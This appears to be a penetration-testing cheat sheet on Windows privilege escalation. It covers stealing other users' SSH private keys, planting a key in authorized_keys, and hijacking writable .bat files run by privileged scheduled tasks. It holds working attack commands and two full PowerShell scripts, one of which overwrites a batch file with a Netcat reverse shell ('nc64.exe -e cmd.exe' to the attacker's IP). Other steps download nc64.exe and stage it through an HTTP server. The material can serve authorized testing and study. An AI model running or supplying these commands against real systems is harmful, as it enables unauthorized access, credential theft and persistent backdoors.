# Windows Privilege Escalation

Here are some techniques for achieving privilege escalation on *Windows* systems:

## <mark style="color:orange;">Abusing SSH keys</mark>

* Check whether we have read permissions on another user's SSH private keys

{% code overflow="wrap" lineNumbers="true" %}

```bash
#On the target machine (cmd)
dir /a C:\Users\$user\.ssh          #List the key files present for a user
type C:\Users\$user\.ssh\$keyfile    #Read a private key for a user
```

{% endcode %}

{% hint style="info" %}
Default key file names are *id\_rsa*, *id\_ecdsa* and *id\_ed25519*; the matching public key sits beside each one with a `.pub` suffix
{% endhint %}

***

* Paste the private key into a file on our machine, restrict its permissions, and log in with it

<pre class="language-bash" data-overflow="wrap" data-line-numbers><code class="lang-bash"><strong>#On our machine
</strong><strong>nano $filename #Copy here the keys
</strong><strong>chmod 600 $filename
</strong>ssh $username@$IP -i $filename
</code></pre>

{% hint style="info" %}
SSH refuses to use a private key file that other users can read (`Permissions 0644 ... are too open` / `UNPROTECTED PRIVATE KEY FILE!`), so `chmod 600 $filename` is required before the key is accepted
{% endhint %}

***

* If we have write permissions on a user's `.ssh/` directory, we can generate a key pair on our machine and plant our public key in that user's `authorized_keys`

{% code overflow="wrap" lineNumbers="true" %}

```bash
#On our machine; -N "" skips the passphrase prompt
ssh-keygen -t ed25519 -f $keyfile -N ""
```

{% endcode %}

{% hint style="info" %}
This generates `$keyfile` (the private key, which stays on our machine) and `$keyfile.pub` (the public key, which is the only part that goes to the target)
{% endhint %}

***

* Append the public key to the target user's `authorized_keys` file (after transferring the `.pub` file to the target)

{% code overflow="wrap" lineNumbers="true" %}

```bash
#On the target machine (cmd); >> appends instead of clobbering keys that are already there
type $keyfilename.pub >> C:\Users\$user\.ssh\authorized_keys
```

{% endcode %}

{% hint style="info" %}
Two Windows-specific caveats: if the target user is a member of *Administrators*, the default Windows OpenSSH `sshd_config` contains `Match Group administrators` with `AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys`, so keys in that user's own `.ssh\authorized_keys` are ignored and `C:\ProgramData\ssh\administrators_authorized_keys` (normally writable only by administrators and SYSTEM) must be used instead. And if the append is done from Windows PowerShell rather than *cmd*, use `Add-Content -Encoding ascii`, because PowerShell's `>` and `>>` write UTF-16 with a BOM, which sshd does not parse as an `authorized_keys` file.
{% endhint %}

***

* Use this to log in as the user using the key

<pre class="language-bash" data-overflow="wrap" data-line-numbers><code class="lang-bash"><strong>ssh $username@$IP -i $keyfile 
</strong></code></pre>
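The checks above, gathered into one script. This is an added example, not code from the original page: run from a foothold PowerShell on the target, it reports every local profile whose private key we can read, every `.ssh` directory whose ACL grants our token write access (so `authorized_keys` could be planted), and whether `sshd_config` routes administrators to `administrators_authorized_keys`. The paths under `C:\Users` and `C:\ProgramData\ssh` are the Windows OpenSSH defaults; nothing on disk is modified.

```powershell
# Added example (not from the original page): triage SSH key material across all
# local profiles. Assumes Windows OpenSSH default paths; read-only.

$keyNames = 'id_rsa', 'id_ecdsa', 'id_ed25519', 'id_dsa'

# Names of our user and every group in our token, to compare with ACL entries.
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principals = @($id.Name)
foreach ($g in $id.Groups) {
    try { $principals += $g.Translate([System.Security.Principal.NTAccount]).Value } catch {}
}

function Test-WritableByUs {
    # True when an Allow ACE for one of our principals grants write-class
    # rights and no Deny ACE for them takes it away (Deny wins).
    param([string]$Path)
    $allow = $false
    foreach ($ace in (Get-Acl -Path $Path -ErrorAction Stop).Access) {
        if ($principals -notcontains $ace.IdentityReference.Value) { continue }
        if ($ace.FileSystemRights -notmatch 'FullControl|Modify|Write') { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allow = $true
    }
    return $allow
}

foreach ($sshDir in Get-ChildItem 'C:\Users\*\.ssh' -Directory -Force -ErrorAction SilentlyContinue) {
    $owner = $sshDir.Parent.Name
    Write-Host "[*] $owner -> $($sshDir.FullName)"
    foreach ($name in $keyNames) {
        $keyPath = Join-Path $sshDir.FullName $name
        if (-not (Test-Path $keyPath)) { continue }
        try {
            # Reading the first line is enough to prove read access.
            $header = Get-Content -Path $keyPath -TotalCount 1 -ErrorAction Stop
            Write-Host "    [+] readable private key: $keyPath ($header)"
        } catch {
            Write-Host "    [-] private key present but not readable: $keyPath"
        }
    }
    try {
        if (Test-WritableByUs $sshDir.FullName) {
            Write-Host "    [+] .ssh directory writable by us: authorized_keys can be planted for $owner"
        }
    } catch {
        Write-Host "    [-] cannot read ACL of $($sshDir.FullName)"
    }
}

# Windows OpenSSH default: members of Administrators authenticate against
# C:\ProgramData\ssh\administrators_authorized_keys, not their own profile.
$sshdConfig = 'C:\ProgramData\ssh\sshd_config'
if (Test-Path $sshdConfig) {
    $adminMatch = Select-String -Path $sshdConfig -Pattern '^\s*AuthorizedKeysFile.*administrators_authorized_keys' -Quiet
    if ($adminMatch) {
        Write-Host "[!] sshd routes Administrators to administrators_authorized_keys; a key planted in an admin's profile will be ignored"
    }
}
```

The ACL check matches ACE identities by name against the groups in our own token, so it reflects what the current user can do without attempting a write; a `Deny` entry for any of our principals short-circuits to "not writable", which is the order Windows evaluates ACEs in.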

## <mark style="color:orange;">Abusing .bat files with full control permissions</mark>

If a *.bat* file (a Windows batch script) is executed on the system by a privileged account (for example from a scheduled task, a service or a logon script) and we have full-control or modify permissions on it, we can replace its content and have our own commands executed with that account's privileges the next time it runs

* Try spawning a PowerShell from the *CMD* with any user we have access to

{% code overflow="wrap" lineNumbers="true" %}

```powershell
...> powershell
PS ...>            #If it worked, the command line will look like this
```

{% endcode %}

***

* Find a *.bat* file and check whether we have full-control (`F`) or modify (`M`) permissions on it. If so, check which processes it launches and whether any of them is still running, which tells us the script is actually used

<pre class="language-powershell" data-overflow="wrap" data-line-numbers><code class="lang-powershell"><strong>icacls $batFile #Check permissions: look for (F) or (M) granted to our user, BUILTIN\Users, Authenticated Users or Everyone
</strong><strong>cat $batFile    #Check the content to know if it is calling any process (cat is an alias of Get-Content)
</strong><strong>ps              #Check if called processes are still running (ps is an alias of Get-Process; tasklist /v also shows the account each process runs as)
</strong></code></pre>

***

* Download a *Netcat* build for *Windows* on our machine and transfer it to the target

{% code overflow="wrap" lineNumbers="true" %}

```powershell
# In our machine (Linux shell); use the raw URL, the blob URL only returns the GitHub HTML page
wget https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe #Get NC executable
python3 -m http.server $myPort #In the folder where we have the executable

# In the target machine (PowerShell; wget is an alias of Invoke-WebRequest)
wget http://${myIP}:${myPort}/nc64.exe -OutFile nc64.exe
```

{% endcode %}

***

* Start a *Netcat* listener to catch the connection, back up the *.bat* file, and replace its content with a command that launches the *Netcat* reverse shell

{% code overflow="wrap" lineNumbers="true" %}

```powershell
# In our machine
nc -nvlp $ncPort

# In the target machine (PowerShell). Keep a copy of the original script, and write the payload as ASCII:
# Windows PowerShell's `>` redirection emits UTF-16 with a BOM, which cmd.exe does not run as a batch file
Copy-Item $batFilePath "$batFilePath.bak"
Set-Content -Path $batFilePath -Value "$ncFilePath -e cmd.exe $myIP $ncPort" -Encoding ascii
```

{% endcode %}

{% hint style="info" %}
Then we just have to wait for the system to run the script again (the task's trigger or the service's restart interval tells us how long); the listener receives a shell running as the account that executes the script
{% endhint %}
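The discovery and overwrite steps above, as an added example that is not part of the original page. It enumerates the *.bat* files that scheduled tasks execute, the account each task runs as, and whether our token can modify the file, and provides a helper that backs up a chosen script and overwrites it with the Netcat one-liner written as ASCII. It assumes `Get-ScheduledTask` is available (Windows 8 / Server 2012 and later) and that we can read the task definitions; `$ncFilePath`, `$myIP` and `$ncPort` are the placeholders used earlier on the page.

```powershell
# Added example (not from the original page): find .bat files launched by
# scheduled tasks, check whether we can modify them, and plant the payload.

function Get-TaskBatchFiles {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principals = @($id.Name)
    foreach ($g in $id.Groups) {
        try { $principals += $g.Translate([System.Security.Principal.NTAccount]).Value } catch {}
    }
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # not an Exec action
            # The .bat is either the action itself or an argument to cmd.exe /c.
            # Quotes are stripped; paths containing spaces are not handled.
            $cmdline = (($action.Execute, $action.Arguments) -join ' ') -replace '"', ''
            if ($cmdline -match '([A-Za-z]:\\\S+?\.bat)') {
                $bat = [Environment]::ExpandEnvironmentVariables($Matches[1])
            } else { continue }
            if (-not (Test-Path $bat)) { continue }
            # Writable if an Allow ACE for one of our principals grants write-class
            # rights and no Deny ACE for them revokes it (Deny is evaluated first).
            $writable = $false
            try {
                foreach ($ace in (Get-Acl -Path $bat).Access) {
                    if ($principals -notcontains $ace.IdentityReference.Value) { continue }
                    if ($ace.FileSystemRights -notmatch 'FullControl|Modify|Write') { continue }
                    if ($ace.AccessControlType -eq 'Deny') { $writable = $false; break }
                    $writable = $true
                }
            } catch {}
            [pscustomobject]@{
                Task     = "$($task.TaskPath)$($task.TaskName)"
                RunAs    = $task.Principal.UserId
                Batch    = $bat
                Writable = $writable
            }
        }
    }
}

function Install-BatchPayload {
    # Overwrite a writable .bat with the reverse-shell one-liner. Windows
    # PowerShell's `>` writes UTF-16 with a BOM, which cmd.exe does not execute
    # as a batch file, so the payload is written as ASCII and a backup is kept.
    param([string]$BatPath, [string]$NcPath, [string]$Lhost, [int]$Lport)
    Copy-Item -Path $BatPath -Destination "$BatPath.bak" -Force
    Set-Content -Path $BatPath -Value "$NcPath -e cmd.exe $Lhost $Lport" -Encoding ascii
}

# Usage: list every candidate, then pick one that is writable and runs as a
# privileged account (RunAs of SYSTEM or a local administrator).
Get-TaskBatchFiles | Format-Table -AutoSize
# Install-BatchPayload -BatPath 'C:\scripts\backup.bat' -NcPath $ncFilePath -Lhost $myIP -Lport $ncPort
```

Only tasks whose definitions we are allowed to read appear in the output; as a non-administrator that is typically a subset, so `schtasks /query /v /fo LIST` and a look at service binaries and logon scripts remain worthwhile for scripts this enumeration cannot see.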


